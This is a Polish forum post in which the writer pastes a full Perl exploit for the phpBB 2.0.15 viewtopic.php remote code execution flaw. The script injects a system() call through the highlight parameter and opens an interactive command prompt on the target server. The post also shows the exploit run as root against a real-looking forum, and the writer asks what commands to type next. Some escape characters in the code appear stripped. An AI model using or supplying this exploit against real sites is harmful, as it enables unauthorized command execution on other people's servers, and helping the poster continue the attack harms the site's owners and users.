Jest sobie taki Exploit na forum w phpbb2_0_15 lub starsze poniżej przedstawiony kod exploita.
Exploit odpalany w linuxie.
Potem pokazuje mi sie coś takiego
I nie wiem co dalej podejżewam że jakieś komendy ale nie znam zabardzo się na tym mógłby ktos pomuc prosze.
Z Góry wielkie dzięki za pomoc pozdro for all
Exploit odpalany w linuxie.
Kod:
#!/usr/bin/perl
# Wed Jun 29 19:08:04 CEST 2005 [email][email protected][/email]
#
# phpBB 2.0.15 -re-bug in viewtopic.php
# The complete Open Source Development with CVS: GNU General Public License
# Book on using CVS effectively <--------- cvs, is also GPL
# or [url]http://www.google.es/search?q=programming+howto[/url]
#
# BLINK! BLINK! BLINK! *** BRUTEFORCE CAPABILITIES *** BLINK! BLINK! BLINK!
#
#
# Example: ./phpbb2_0_15.pl [url]http://www.server.com/viewtopic.php?t=1[/url]
# You can start typing commands.
# Tested in BSD. Theo.. it works!
#
# !dSR: que todos los hackers digan YO!!
#
#
use strict;
use IO::Socket;
unless ($ARGV[0]) { print "$0 <viewtopic url>n"; exit(1); }
$ARGV[0] =~ m!http://(.*?)/(.*?t=d+)!;
my ($server, $port) = split (/:/,$1);
$port = 80 unless defined($port);
$server = $1 unless defined($server);
my ($url, $command) = $2;
print "$server - $port - $urln";
while () {
print "phpBB2.0.15> ";
while(<STDIN>) {
$command=$_;
chomp($command);
last;
}
&send($command);
}
sub send {
my $ok = 0;
my $cmd = "echo "#PHPBBEXPLOIT#";".$_[0].";echo "#PHPBBEXPLOIT#"";
my $string = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1n".
"Host: $servernPHP: $cmdnnnn";
my $socket = IO::Socket::INET->new(PeerAddr => $server,
PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM)
or die "can't connect to: $server : $@n";
print $socket $string;
while(<$socket>) {
if (/#PHPBBEXPLOIT#/) {
close($socket) and last if $ok eq 2;
$ok++;
next;
}
print if $ok eq "1";
}
}
exit 0;
Kod:
[root@localhost satanika]# perl phpbb.sh [url]http://www.xxxxx.pl/viewtopic.php?t=828[/url]
[url]www.xxxxx.pl[/url] - 80 - viewtopic.php?t=828
phpBB2.0.15>
Z Góry wielkie dzięki za pomoc pozdro for all